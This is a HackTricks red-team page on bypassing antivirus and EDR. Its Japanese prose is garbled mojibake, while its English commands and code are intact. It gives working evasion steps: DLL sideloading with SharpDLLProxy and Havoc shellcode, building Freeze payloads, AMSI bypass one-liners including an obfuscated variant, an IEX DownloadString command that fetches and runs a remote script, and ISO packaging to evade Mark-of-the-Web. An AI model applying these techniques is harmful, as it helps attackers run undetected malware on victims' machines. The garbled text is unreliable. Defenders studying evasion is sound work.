40 KiB
Antivirus (AV) Bypass
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the ð¬ Discord group or the telegram group or follow us on Twitter ðŠ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
ãã®ããŒãžã¯ @m2rc_pã«ãã£ãŠæžãããŸããïŒ
AVåé¿æ¹æ³è«
çŸåšãAVã¯ãã¡ã€ã«ãæªæã®ãããã®ã§ãããã©ããã確èªããããã«ãéçæ€åºãåçåæããããŠããé«åºŠãªEDRã®å Žåã¯è¡ååæãªã©ãããŸããŸãªæ¹æ³ã䜿çšããŠããŸãã
éçæ€åº
éçæ€åºã¯ããã€ããªãã¹ã¯ãªããå ã®æ¢ç¥ã®æªæã®ããæååããã€ãã®é åã«ãã©ã°ãç«ãŠããããã¡ã€ã«èªäœããæ å ±ãæœåºãããããããšã§éæãããŸãïŒäŸïŒãã¡ã€ã«ã®èª¬æãäŒç€Ÿåãããžã¿ã«çœ²åãã¢ã€ã³ã³ããã§ãã¯ãµã ãªã©ïŒãããã¯ãæ¢ç¥ã®å ¬éããŒã«ã䜿çšãããšãåæãããŠæªæã®ãããã®ãšããŠãã©ã°ãç«ãŠãããŠããå¯èœæ§ãé«ããããç°¡åã«æãŸãå¯èœæ§ãããããšãæå³ããŸãããã®çš®ã®æ€åºãåé¿ããæ¹æ³ã¯ããã€ããããŸãïŒ
- æå·å
ãã€ããªãæå·åãããšãAVãããã°ã©ã ãæ€åºããæ¹æ³ã¯ãªããªããŸãããã¡ã¢ãªå ã§ããã°ã©ã ã埩å·åããŠå®è¡ããããã®ããŒããŒãå¿ èŠã«ãªããŸãã
- é£èªå
æã«ã¯ãAVãééãããããã«ãã€ããªãã¹ã¯ãªããå ã®ããã€ãã®æååãå€æŽããã ãã§æžãããšããããŸãããäœãé£èªåããããšããŠãããã«ãã£ãŠã¯ãæéããããäœæ¥ã«ãªãããšããããŸãã
- ã«ã¹ã¿ã ããŒã«
ç¬èªã®ããŒã«ãéçºããã°ãæ¢ç¥ã®æªæã®ããã·ã°ããã£ã¯ååšããŸããããããã«ã¯å€ãã®æéãšåŽåãããããŸãã
{% hint style="info" %} Windows Defenderã®éçæ€åºã«å¯Ÿæããè¯ãæ¹æ³ã¯ThreatCheckã§ããããã¯åºæ¬çã«ãã¡ã€ã«ãè€æ°ã®ã»ã°ã¡ã³ãã«åå²ããDefenderã«ãããããåå¥ã«ã¹ãã£ã³ãããããšã§ããã€ããªå ã®ãã©ã°ãç«ãŠãããæååããã€ããæ£ç¢ºã«æããŠãããŸãã {% endhint %}
å®è·µçãªAVåé¿ã«é¢ãããã®YouTubeãã¬ã€ãªã¹ãããã²ãã§ãã¯ããããšããå§ãããŸãã
åçåæ
åçåæã¯ãAVããã€ããªããµã³ãããã¯ã¹å ã§å®è¡ããæªæã®ãã掻åãç£èŠããããšã§ãïŒäŸïŒãã©ãŠã¶ã®ãã¹ã¯ãŒãã埩å·åããŠèªã¿åãããšãããLSASSã®ãããã³ããå®è¡ãããªã©ïŒããã®éšåã¯æ±ããå°ãé£ããããšããããŸããããµã³ãããã¯ã¹ãåé¿ããããã«ã§ããããšã¯ããã€ããããŸãã
- å®è¡åã®ã¹ãªãŒã å®è£ æ¹æ³ã«ãã£ãŠã¯ãAVã®åçåæãåé¿ããããã®çŽ æŽãããæ¹æ³ã«ãªãããšããããŸããAVã¯ãŠãŒã¶ãŒã®äœæ¥ãããŒãäžæããªãããã«ãã¡ã€ã«ãã¹ãã£ã³ããããã®æéãéåžžã«çããããé·ãã¹ãªãŒãã䜿çšãããšãã€ããªã®åæã劚ããããšãã§ããŸããåé¡ã¯ãå€ãã®AVã®ãµã³ãããã¯ã¹ãå®è£ æ¹æ³ã«ãã£ãŠã¯ã¹ãªãŒããã¹ãããã§ããããšã§ãã
- ãã·ã³ã®ãªãœãŒã¹ããã§ã㯠éåžžããµã³ãããã¯ã¹ã¯æ±ãããªãœãŒã¹ãéåžžã«å°ãªãïŒäŸïŒ< 2GB RAMïŒãããããã§ãªããã°ãŠãŒã¶ãŒã®ãã·ã³ãé ãããå¯èœæ§ããããŸããããã§ã¯éåžžã«ã¯ãªãšã€ãã£ãã«ãªãããšãã§ããŸããããšãã°ãCPUã®æž©åºŠããã¡ã³ã®é床ããã§ãã¯ããããšã§ããã¹ãŠããµã³ãããã¯ã¹ã«å®è£ ãããŠããããã§ã¯ãããŸããã
- ãã·ã³åºæã®ãã§ã㯠"contoso.local"ãã¡ã€ã³ã«åå ããŠãããŠãŒã¶ãŒãã¿ãŒã²ããã«ãããå Žåãã³ã³ãã¥ãŒã¿ã®ãã¡ã€ã³ããã§ãã¯ããŠæå®ãããã®ãšäžèŽãããã©ããã確èªã§ããŸããäžèŽããªãå Žåã¯ãããã°ã©ã ãçµäºãããããšãã§ããŸãã
Microsoft Defenderã®ãµã³ãããã¯ã¹ã®ã³ã³ãã¥ãŒã¿åã¯HAL9THã§ãããããççºåã«ãã«ãŠã§ã¢å ã§ã³ã³ãã¥ãŒã¿åããã§ãã¯ã§ããŸããååãHAL9THãšäžèŽããå ŽåãDefenderã®ãµã³ãããã¯ã¹å ã«ããããšãæå³ãããããããã°ã©ã ãçµäºãããããšãã§ããŸãã
ãµã³ãããã¯ã¹ã«å¯Ÿæããããã®@mgeekyããã®ä»ã®éåžžã«è¯ããã³ã
ãã®æçš¿ã§ä»¥åã«è¿°ã¹ãããã«ãå ¬éããŒã«ã¯æçµçã«æ€åºãããããã次ã®ããšãèªåããå¿ èŠããããŸãïŒ
ããšãã°ãLSASSããã³ããããå Žåãæ¬åœã«mimikatzã䜿çšããå¿ èŠããããŸããïŒãããšããLSASSããã³ãããå¥ã®ããŸãç¥ãããŠããªããããžã§ã¯ãã䜿çšã§ããŸããã
æ£ããçãã¯ããããåŸè ã§ããmimikatzãäŸã«åããšãããã¯ããããAVãEDRã«ãã£ãŠæããã©ã°ãç«ãŠããããã«ãŠã§ã¢ã®äžã€ã§ããããããžã§ã¯ãèªäœã¯éåžžã«ã¯ãŒã«ã§ãããAVãåé¿ããããã«ãããæ±ãã®ã¯æªå€¢ã®ãããªãã®ã§ãããããã£ãŠãéæããããšããŠããããšã®ä»£æ¿æ段ãæ¢ããŠãã ããã
{% hint style="info" %} åé¿ã®ããã«ãã€ããŒããå€æŽããéã¯ãDefenderã§èªåãµã³ãã«éä¿¡ããªãã«ããããšã確èªããé·æçã«åé¿ãéæããããšãç®æšã§ããå Žåã¯ãVIRUSTOTALã«ã¢ããããŒãããªãã§ãã ãããç¹å®ã®AVã«ãã£ãŠãã€ããŒããæ€åºããããã©ããã確èªãããå Žåã¯ãVMã«ã€ã³ã¹ããŒã«ããèªåãµã³ãã«éä¿¡ããªãã«ããçµæã«æºè¶³ãããŸã§ããã§ãã¹ãããŠãã ããã {% endhint %}
EXEãšDLL
å¯èœãªéããåžžã«åé¿ã®ããã«DLLã䜿çšããããšãåªå ããŠãã ãããç§ã®çµéšã§ã¯ãDLLãã¡ã€ã«ã¯éåžžã¯ããã«æ€åºããã«ãããåæããã«ãããããå Žåã«ãã£ãŠã¯æ€åºãåé¿ããããã®éåžžã«ç°¡åãªããªãã¯ã§ãïŒãã¡ããããã€ããŒããDLLãšããŠå®è¡ãããæ¹æ³ãããå ŽåïŒã
ãã®ç»åã«ç€ºãããŠããããã«ãHavocã®DLLãã€ããŒãã¯antiscan.meã§ã®æ€åºçã4/26ã§ããã®ã«å¯ŸããEXEãã€ããŒãã¯7/26ã®æ€åºçã§ãã
ããã§ã¯ãDLLãã¡ã€ã«ã䜿çšããŠã¯ããã«ã¹ãã«ã¹æ§ãé«ããããã®ããã€ãã®ããªãã¯ã瀺ããŸãã
DLLãµã€ãããŒãã£ã³ã°ãšãããã·ã³ã°
DLLãµã€ãããŒãã£ã³ã°ã¯ãããŒããŒã«ãã£ãŠäœ¿çšãããDLLæ€çŽ¢é åºãå©çšãã被害è ã¢ããªã±ãŒã·ã§ã³ãšæªæã®ãããã€ããŒãã䞊ã¹ãŠé 眮ããããšã§ãã
DLLãµã€ãããŒãã£ã³ã°ã«è匱ãªããã°ã©ã ããã§ãã¯ããã«ã¯ãSiofraãšæ¬¡ã®PowerShellã¹ã¯ãªããã䜿çšã§ããŸãïŒ
{% code overflow="wrap" %}
Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
$binarytoCheck = "C:\Program Files\" + $_
C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
}
{% endcode %}
ãã®ã³ãã³ãã¯ããC:\Program Files\ãå ã§DLLãã€ãžã£ãã¯ã«è匱ãªããã°ã©ã ã®ãªã¹ããšãããããèªã¿èŸŒãããšããDLLãã¡ã€ã«ãåºåããŸãã
ç§ã¯ããªããDLLãã€ãžã£ãã¯å¯èœ/ãµã€ãããŒãå¯èœãªããã°ã©ã ãèªåã§èª¿æ»ããããšã匷ããå§ãããŸãããã®æè¡ã¯é©åã«è¡ãã°éåžžã«ã¹ãã«ã¹æ§ããããŸãããäžè¬ã«ç¥ãããŠããDLLãµã€ãããŒãå¯èœãªããã°ã©ã ã䜿çšãããšãç°¡åã«æãŸãå¯èœæ§ããããŸãã
æªæã®ããDLLãããã°ã©ã ãèªã¿èŸŒãããšãæåŸ ããååã§é 眮ããã ãã§ã¯ããã€ããŒãã¯èªã¿èŸŒãŸããŸãããããã°ã©ã ã¯ãã®DLLå ã«ç¹å®ã®é¢æ°ãæåŸ ããŠããããããã®åé¡ã解決ããããã«ãDLLãããã·ã³ã°/ãã©ã¯ãŒãã£ã³ã°ãšããå¥ã®æè¡ã䜿çšããŸãã
DLLãããã·ã³ã°ã¯ãããã°ã©ã ããããã·ïŒããã³æªæã®ããïŒDLLããå ã®DLLã«å¯ŸããŠè¡ãåŒã³åºãã転éããããã°ã©ã ã®æ©èœãä¿æãã€ã€ããã€ããŒãã®å®è¡ãåŠçã§ããããã«ããŸãã
ç§ã¯@flangvikã®SharpDLLProxyãããžã§ã¯ãã䜿çšããŸãã
ç§ãåŸã£ãæé ã¯æ¬¡ã®ãšããã§ãïŒ
{% code overflow="wrap" %}
1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
3. (Optional) Encode your shellcode using Shikata Ga Nai (https://github.com/EgeBalci/sgn)
4. Use SharpDLLProxy to create the proxy dll (.\SharpDllProxy.exe --dll .\mimeTools.dll --payload .\demon.bin)
{% endcode %}
æåŸã®ã³ãã³ãã¯ãDLLãœãŒã¹ã³ãŒããã³ãã¬ãŒããšå ã®ååãå€æŽããDLLã®2ã€ã®ãã¡ã€ã«ãçæããŸãã
{% code overflow="wrap" %}
5. Create a new visual studio project (C++ DLL), paste the code generated by SharpDLLProxy (Under output_dllname/dllname_pragma.c) and compile. Now you should have a proxy dll which will load the shellcode you've specified and also forward any calls to the original DLL.
{% endcode %}
ãããçµæã§ãïŒ
ç§ãã¡ã®ã·ã§ã«ã³ãŒãïŒSGNã§ãšã³ã³ãŒããããïŒãšãããã·DLLã¯ãantiscan.meã§0/26ã®æ€åºçãæã£ãŠããŸãïŒããã¯æåã ãšèšããã§ãããã
{% hint style="info" %} ç§ã¯åŒ·ãæšå¥šããŸããS3cur3Th1sSh1tã®twitch VODãèŠèŽãããŸãippsecã®ãããªãèŠãŠãç§ãã¡ãããæ·±ãè°è«ããããšã«ã€ããŠåŠãã§ãã ããã {% endhint %}
Freeze
Freezeã¯ããµã¹ãã³ããããããã»ã¹ãçŽæ¥ã·ã¹ãã ã³ãŒã«ãããã³ä»£æ¿å®è¡æ¹æ³ã䜿çšããŠEDRããã€ãã¹ããããã®ãã€ããŒãããŒã«ãããã§ã
Freezeã䜿çšããŠãã·ã§ã«ã³ãŒããã¹ãã«ã¹ãªæ¹æ³ã§ããŒãããã³å®è¡ã§ããŸãã
Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
2. ./Freeze -I demon.bin -encrypt -O demon.exe
3. Profit, no alerts from defender
{% hint style="info" %} åé¿ã¯åãªãç«ãšããºãã®ã²ãŒã ã§ãããä»æ¥æ©èœãããã®ãææ¥æ€åºãããå¯èœæ§ããããããå¯èœã§ããã°1ã€ã®ããŒã«ã«äŸåãããè€æ°ã®åé¿æè¡ãçµã¿åãããŠè©Šã¿ãŠãã ããã {% endhint %}
AMSI (ã¢ã³ããã«ãŠã§ã¢ã¹ãã£ã³ã€ã³ã¿ãŒãã§ãŒã¹)
AMSIã¯ããã¡ã€ã«ã¬ã¹ãã«ãŠã§ã¢ããé²ãããã«äœæãããŸãããæåã¯ãAVã¯ãã£ã¹ã¯äžã®ãã¡ã€ã«ã®ã¿ãã¹ãã£ã³ã§ããããããã€ããŒããã¡ã¢ãªå ã§çŽæ¥å®è¡ã§ããã°ãAVã¯äœãé²ãããšãã§ããŸããã§ããããªããªããååãªå¯èŠæ§ããªãã£ãããã§ãã
AMSIæ©èœã¯Windowsã®ãããã®ã³ã³ããŒãã³ãã«çµ±åãããŠããŸãã
- ãŠãŒã¶ãŒã¢ã«ãŠã³ãå¶åŸ¡ããŸãã¯UACïŒEXEãCOMãMSIããŸãã¯ActiveXã€ã³ã¹ããŒã«ã®ææ ŒïŒ
- PowerShellïŒã¹ã¯ãªããã察話ç䜿çšãããã³åçã³ãŒãè©äŸ¡ïŒ
- Windows Script HostïŒwscript.exeããã³cscript.exeïŒ
- JavaScriptããã³VBScript
- Office VBAãã¯ã
ããã¯ãã¹ã¯ãªããã®å 容ãæå·åãããŠããããé£èªåãããŠããªã圢åŒã§å ¬éããããšã«ãããã¢ã³ããŠã€ã«ã¹ãœãªã¥ãŒã·ã§ã³ãã¹ã¯ãªããã®åäœãæ€æ»ã§ããããã«ããŸãã
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
ãå®è¡ãããšãWindows Defenderã§æ¬¡ã®ã¢ã©ãŒãã衚瀺ãããŸãã
ã¹ã¯ãªãããå®è¡ãããå®è¡å¯èœãã¡ã€ã«ãžã®ãã¹ã®åã«amsi:
ãä»å ãããŠããããšã«æ³šæããŠãã ããããã®å Žåãpowershell.exeã§ãã
ãã£ã¹ã¯ã«ãã¡ã€ã«ãèœãšããªãã£ãã«ãããããããAMSIã®ããã«ã¡ã¢ãªå ã§æãŸã£ãŠããŸããŸããã
AMSIãåé¿ããæ¹æ³ã¯ããã€ããããŸãïŒ
- é£èªå
AMSIã¯äž»ã«éçæ€åºã§æ©èœãããããèªã¿èŸŒãããšããã¹ã¯ãªãããå€æŽããããšã¯ãæ€åºãåé¿ããè¯ãæ¹æ³ãšãªãå¯èœæ§ããããŸãã
ãã ããAMSIã¯è€æ°ã®ã¬ã€ã€ãŒããã£ãŠãã¹ã¯ãªãããé£èªå解é€ããèœåããããããé£èªåã®æ¹æ³ã«ãã£ãŠã¯æªãéžæè¢ãšãªãå¯èœæ§ããããŸããããã«ãããåé¿ãç°¡åã§ã¯ãªããªããŸãããã ããæã«ã¯å€æ°åãããã€ãå€æŽããã ãã§æžãããšããããããã©ãã ããã©ã°ãç«ãŠãããŠãããã«ãããŸãã
- AMSIãã€ãã¹
AMSIã¯powershellïŒãŸãã¯cscript.exeãwscript.exeãªã©ïŒã®ããã»ã¹ã«DLLãããŒãããããšã«ãã£ãŠå®è£ ãããŠãããããç¹æš©ã®ãªããŠãŒã¶ãŒãšããŠå®è¡ããŠãç°¡åã«æ¹ããããããšãå¯èœã§ãããã®AMSIã®å®è£ ã®æ¬ é¥ã«ãããç 究è ãã¡ã¯AMSIã¹ãã£ã³ãåé¿ããããã®è€æ°ã®æ¹æ³ãèŠã€ããŸããã
ãšã©ãŒã匷å¶ãã
AMSIã®åæåã倱æãããïŒamsiInitFailedïŒããšã§ãçŸåšã®ããã»ã¹ã«å¯ŸããŠã¹ãã£ã³ãéå§ãããªãçµæã«ãªããŸããå ã ãããã¯Matt Graeberã«ãã£ãŠå ¬éãããMicrosoftã¯åºç¯ãªäœ¿çšãé²ãããã®ã·ã°ããã£ãéçºããŸããã
{% code overflow="wrap" %}
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
{% endcode %}
çŸåšã®powershellããã»ã¹ã§AMSIãç¡å¹ã«ããããã«ã¯ã1è¡ã®powershellã³ãŒãã ãã§æžã¿ãŸããããã®è¡ã¯ãã¡ããAMSIèªäœã«ãã£ãŠãã©ã°ãç«ãŠãããŠããããããã®æè¡ã䜿çšããã«ã¯ããã€ãã®ä¿®æ£ãå¿ èŠã§ãã
ãã¡ãã¯ãç§ããã®Github Gistããåã£ãä¿®æ£ãããAMSIãã€ãã¹ã§ãã
Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
$DiskMgr = 'Syst+@.Mãnãg' + 'e@+nt.Auto@' + 'ãtion.A' -join ''
$fdx = '@ms' + 'ãInã' + 'tF@ã' + 'l+d' -Join '';Start-Sleep -Milliseconds 300
$CleanUp = $DiskMgr.Replace('@','m').Replace('ã','a').Replace('+','e')
$Rawdata = $fdx.Replace('@','a').Replace('ã','i').Replace('+','e')
$SDcleanup = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $CleanUp,$Homedrive,$Xdatabase))
$Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
Keep in mind, that this will probably get flagged once this post comes out, so you should not publish any code if your plan is staying undetected.
ã¡ã¢ãªããã
ãã®æè¡ã¯æåã« @RastaMouse ã«ãã£ãŠçºèŠãããamsi.dllå ã®ãAmsiScanBufferãé¢æ°ã®ã¢ãã¬ã¹ãèŠã€ããŠãE_INVALIDARGã®ã³ãŒããè¿ãããã«äžæžãããããšãå«ã¿ãŸããããã«ãããå®éã®ã¹ãã£ã³ã®çµæã¯0ãè¿ããããã¯ã¯ãªãŒã³ãªçµæãšããŠè§£éãããŸãã
{% hint style="info" %} ãã詳现ãªèª¬æã«ã€ããŠã¯ãhttps://rastamouse.me/memory-patching-amsi-bypass/ããèªã¿ãã ããã {% endhint %}
ãŸããPowerShellã䜿çšããŠAMSIããã€ãã¹ããããã®ä»ã®å€ãã®æè¡ããããŸãã詳现ã«ã€ããŠã¯ããã®ããŒãžããã®ãªããžããªããã§ãã¯ããŠãã ããã
ãŸãããã®ã¹ã¯ãªããã¯ã¡ã¢ãªããããä»ããŠæ°ããPowershããããããŸãã
é£èªå
C#ã®ã¯ãªã¢ããã¹ãã³ãŒããé£èªåãããããã€ããªãã³ã³ãã€ã«ããããã®ã¡ã¿ããã°ã©ãã³ã°ãã³ãã¬ãŒããçæããããã³ã³ãã€ã«ããããã€ããªãé£èªåããããã«äœ¿çšã§ããããŒã«ã¯ããã€ããããŸãïŒ
- InvisibilityCloak: C# é£èªåããŒã«
- Obfuscator-LLVM: ãã®ãããžã§ã¯ãã®ç®çã¯ãLLVMã³ã³ãã€ã«ã¹ã€ãŒãã®ãªãŒãã³ãœãŒã¹ãã©ãŒã¯ãæäŸããã³ãŒãé£èªåãšæ¹ããé²æ¢ãéããŠãœãããŠã§ã¢ã®ã»ãã¥ãªãã£ãåäžãããããšã§ãã
- ADVobfuscator: ADVobfuscatorã¯ã
C++11/14
èšèªã䜿çšããŠãå€éšããŒã«ã䜿çšãããã³ã³ãã€ã©ãå€æŽããã«ãã³ã³ãã€ã«æã«é£èªåãããã³ãŒããçæããæ¹æ³ã瀺ããŠããŸãã - obfy: C++ãã³ãã¬ãŒãã¡ã¿ããã°ã©ãã³ã°ãã¬ãŒã ã¯ãŒã¯ã«ãã£ãŠçæãããé£èªåãããæäœã®ã¬ã€ã€ãŒãè¿œå ããã¢ããªã±ãŒã·ã§ã³ãã¯ã©ããã³ã°ããããšãã人ã®ç掻ãå°ãé£ããããŸãã
- Alcatraz: Alcatrazã¯ã.exeã.dllã.sysãªã©ã®ããŸããŸãªpeãã¡ã€ã«ãé£èªåã§ããx64ãã€ããªé£èªåããŒã«ã§ãã
- metame: Metameã¯ãä»»æã®å®è¡å¯èœãã¡ã€ã«çšã®ã·ã³ãã«ãªã¡ã¿ã¢ã«ãã£ãã¯ã³ãŒããšã³ãžã³ã§ãã
- ropfuscator: ROPfuscatorã¯ãROPïŒãªã¿ãŒã³æåããã°ã©ãã³ã°ïŒã䜿çšããŠLLVMãµããŒãèšèªã®ããã®çŽ°ç²åºŠã®ã³ãŒãé£èªåãã¬ãŒã ã¯ãŒã¯ã§ããROPfuscatorã¯ãéåžžã®åœä»€ãROPãã§ãŒã³ã«å€æããããšã«ãã£ãŠãã¢ã»ã³ããªã³ãŒãã¬ãã«ã§ããã°ã©ã ãé£èªåããéåžžã®å¶åŸ¡ãããŒã®èªç¶ãªæŠå¿µã劚害ããŸãã
- Nimcrypt: Nimcryptã¯ãNimã§æžããã.NET PEã¯ãªãã¿ãŒã§ãã
- inceptor: Inceptorã¯ãæ¢åã®EXE/DLLãã·ã§ã«ã³ãŒãã«å€æãããããããŒãããããšãã§ããŸãã
SmartScreen & MoTW
ã€ã³ã¿ãŒãããããããã€ãã®å®è¡å¯èœãã¡ã€ã«ãããŠã³ããŒãããŠå®è¡ããéã«ããã®ç»é¢ãèŠãããšããããããããŸããã
Microsoft Defender SmartScreenã¯ããšã³ããŠãŒã¶ãŒãæœåšçã«æªæã®ããã¢ããªã±ãŒã·ã§ã³ãå®è¡ããã®ãé²ãããã®ã»ãã¥ãªãã£ã¡ã«ããºã ã§ãã
SmartScreenã¯äž»ã«è©å€ããŒã¹ã®ã¢ãããŒãã§æ©èœããäžè¬çã§ãªãããŠã³ããŒãã¢ããªã±ãŒã·ã§ã³ã¯SmartScreenãããªã¬ãŒãããšã³ããŠãŒã¶ãŒããã¡ã€ã«ãå®è¡ããã®ãèŠåãé²æ¢ããŸãïŒãã ãããã¡ã€ã«ã¯ã詳现æ å ±ã->ãããã§ãå®è¡ããã¯ãªãã¯ããããšã§å®è¡ã§ããŸãïŒã
MoTWïŒMark of The WebïŒã¯ãNTFS Alternate Data Streamã§ãZone.Identifierãšããååãä»ããããã€ã³ã¿ãŒããããããã¡ã€ã«ãããŠã³ããŒããããšèªåçã«äœæãããããŠã³ããŒãå ã®URLãšå ±ã«ä¿åãããŸãã
{% hint style="info" %} ä¿¡é Œããã眲å蚌ææžã§çœ²åãããå®è¡å¯èœãã¡ã€ã«ã¯SmartScreenãããªã¬ãŒããªãããšã«æ³šæããããšãéèŠã§ãã {% endhint %}
ãã€ããŒããMark of The Webãåãåããªãããã«ããéåžžã«å¹æçãªæ¹æ³ã¯ãããããISOã®ãããªã³ã³ããã«ããã±ãŒãžåããããšã§ããããã¯ãMark-of-the-Web (MOTW) ã éNTFSããªã¥ãŒã ã«é©çšã§ããªãããã§ãã
PackMyPayloadã¯ãMark-of-the-Webãåé¿ããããã«ãã€ããŒããåºåã³ã³ããã«ããã±ãŒãžåããããŒã«ã§ãã
䜿çšäŸ:
PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso
+ o + o + o + o
+ o + + o + +
o + + + o + + o
-_-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-_-_-_-_-_-_-_,------, o
:: PACK MY PAYLOAD (1.1.0) -_-_-_-_-_-_-| /\_/\
for all your container cravings -_-_-_-_-_-~|__( ^ .^) + +
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-__-_-_-_-_-_-_-'' ''
+ o o + o + o o + o
+ o + o ~ Mariusz Banach / mgeeky o
o ~ + ~ <mb [at] binary-offensive.com>
o + o + +
[.] Packaging input file to output .iso (iso)...
Burning file onto ISO:
Adding file: /TotallyLegitApp.exe
[+] Generated file written to (size: 3420160): container.iso
Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files using PackMyPayload
C# ã¢ã»ã³ããªãªãã¬ã¯ã·ã§ã³
C# ãã€ããªãã¡ã¢ãªã«ããŒãããããšã¯ããªãåããç¥ãããŠãããAVã«æãŸãããšãªããã¹ããšã¯ã¹ããã€ãããŒã«ãå®è¡ããããã®éåžžã«åªããæ¹æ³ã§ãã
ãã€ããŒãã¯ãã£ã¹ã¯ã«è§Šããã«çŽæ¥ã¡ã¢ãªã«ããŒãããããããããã»ã¹å šäœã§AMSIããããããããšã ããå¿é ããã°ããã§ãã
ã»ãšãã©ã®C2ãã¬ãŒã ã¯ãŒã¯ïŒsliverãCovenantãmetasploitãCobaltStrikeãHavocãªã©ïŒã¯ããã§ã«C#ã¢ã»ã³ããªãã¡ã¢ãªå ã§çŽæ¥å®è¡ããæ©èœãæäŸããŠããŸãããç°ãªãæ¹æ³ããããŸãïŒ
- ãã©ãŒã¯ïŒã©ã³
ããã¯æ°ããç ç²ããã»ã¹ãçæãããã®æ°ããããã»ã¹ã«ãã¹ããšã¯ã¹ããã€ãã®æªæã®ããã³ãŒããæ³šå ¥ããæªæã®ããã³ãŒããå®è¡ããçµäºãããæ°ããããã»ã¹ãçµäºãããããšãå«ã¿ãŸããããã«ã¯å©ç¹ãšæ¬ ç¹ããããŸãããã©ãŒã¯ïŒã©ã³ã¡ãœããã®å©ç¹ã¯ãå®è¡ãç§ãã¡ã®ããŒã³ã³ã€ã³ãã©ã³ãããã»ã¹ã®å€éšã§è¡ãããããšã§ããããã¯ããã¹ããšã¯ã¹ããã€ãã¢ã¯ã·ã§ã³ã®äœããããŸããããªãå ŽåãæãŸã£ãå Žåãç§ãã¡ã®ã€ã³ãã©ã³ããçãæ®ãå¯èœæ§ãã¯ããã«é«ãããšãæå³ããŸããæ¬ ç¹ã¯ãè¡åæ€åºã«ãã£ãŠæãŸãå¯èœæ§ãé«ããªãããšã§ãã
- ã€ã³ã©ã€ã³
ããã¯ããã¹ããšã¯ã¹ããã€ãã®æªæã®ããã³ãŒããèªåã®ããã»ã¹ã«æ³šå ¥ããããšã§ãããã®æ¹æ³ã§ã¯ãæ°ããããã»ã¹ãäœæããŠAVã«ã¹ãã£ã³ãããã®ãé¿ããããšãã§ããŸãããæ¬ ç¹ã¯ããã€ããŒãã®å®è¡ã«äœãåé¡ãçºçããå ŽåãããŒã³ã³ã倱ãå¯èœæ§ãã¯ããã«é«ããªãããšã§ãã
{% hint style="info" %} C# ã¢ã»ã³ããªã®ããŒãã«ã€ããŠãã£ãšç¥ãããå Žåã¯ããã®èšäº https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/ ãšãã®InlineExecute-Assembly BOF (https://github.com/xforcered/InlineExecute-Assembly) ããã§ãã¯ããŠãã ããã {% endhint %}
C# ã¢ã»ã³ããªãPowerShellããããŒãããããšãã§ããŸãã Invoke-SharpLoader ãš S3cur3th1sSh1tã®ãã㪠ããã§ãã¯ããŠãã ããã
ä»ã®ããã°ã©ãã³ã°èšèªã®äœ¿çš
https://github.com/deeexcee-io/LOI-Bins ã§ææ¡ãããŠããããã«ã劥åããããã·ã³ã«æ»æè ãå¶åŸ¡ããSMBå ±æã«ã€ã³ã¹ããŒã«ãããã€ã³ã¿ããªã¿ç°å¢ãžã®ã¢ã¯ã»ã¹ãäžããããšã§ãä»ã®èšèªã䜿çšããŠæªæã®ããã³ãŒããå®è¡ããããšãå¯èœã§ãã
ã€ã³ã¿ããªã¿ãã€ããªãšSMBå ±æäžã®ç°å¢ãžã®ã¢ã¯ã»ã¹ãèš±å¯ããããšã§ã劥åããããã·ã³ã®ã¡ã¢ãªå ã§ãããã®èšèªã®ä»»æã®ã³ãŒããå®è¡ããããšãã§ããŸãã
ãªããžããªã¯æ¬¡ã®ããã«ç€ºããŠããŸãïŒDefenderã¯ã¹ã¯ãªãããã¹ãã£ã³ãç¶ããŸãããGoãJavaãPHPãªã©ãå©çšããããšã§ãéçã·ã°ããã£ããã€ãã¹ããæè»æ§ãé«ãŸããŸãããããã®èšèªã§ã©ã³ãã ãªéé£èªåãªããŒã¹ã·ã§ã«ã¹ã¯ãªããããã¹ãããçµæãæåã確èªãããŸããã
é«åºŠãªåé¿
åé¿ã¯éåžžã«è€éãªãããã¯ã§ãããæã«ã¯1ã€ã®ã·ã¹ãã å ã®å€ãã®ç°ãªããã¬ã¡ããªãœãŒã¹ãèæ ®ããå¿ èŠããããããæçããç°å¢ã§ã¯å®å šã«æ€åºãããªãããšã¯ã»ãŒäžå¯èœã§ãã
察æããç°å¢ã¯ããããç¬èªã®åŒ·ã¿ãšåŒ±ã¿ãæã£ãŠããŸãã
@ATTL4S ã®ãã®ããŒã¯ããã²ã芧ããã ããé«åºŠãªåé¿æè¡ã«ã€ããŠã®è¶³ããããåŸãŠãã ããã
{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %}
@mariuszbit ã«ããæ·±ãåé¿ã«ã€ããŠã®å¥ã®çŽ æŽãããããŒã¯ããããŸãã
{% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %}
å€ãæè¡
Defenderãæªæã®ãããã®ãšããŠèŠã€ããéšåã確èªãã
ThreatCheck ã䜿çšãããšããã€ããªã®äžéšãåé€ããŠãDefenderãæªæã®ãããã®ãšããŠèŠã€ããŠããéšåãç¹å®ãããããåå²ããŠãããŸãã
åãããšãè¡ãå¥ã®ããŒã«ã¯ãavred ã§ããªãŒãã³ãŠã§ãã§ãµãŒãã¹ãæäŸããŠããŸã https://avred.r00ted.ch/
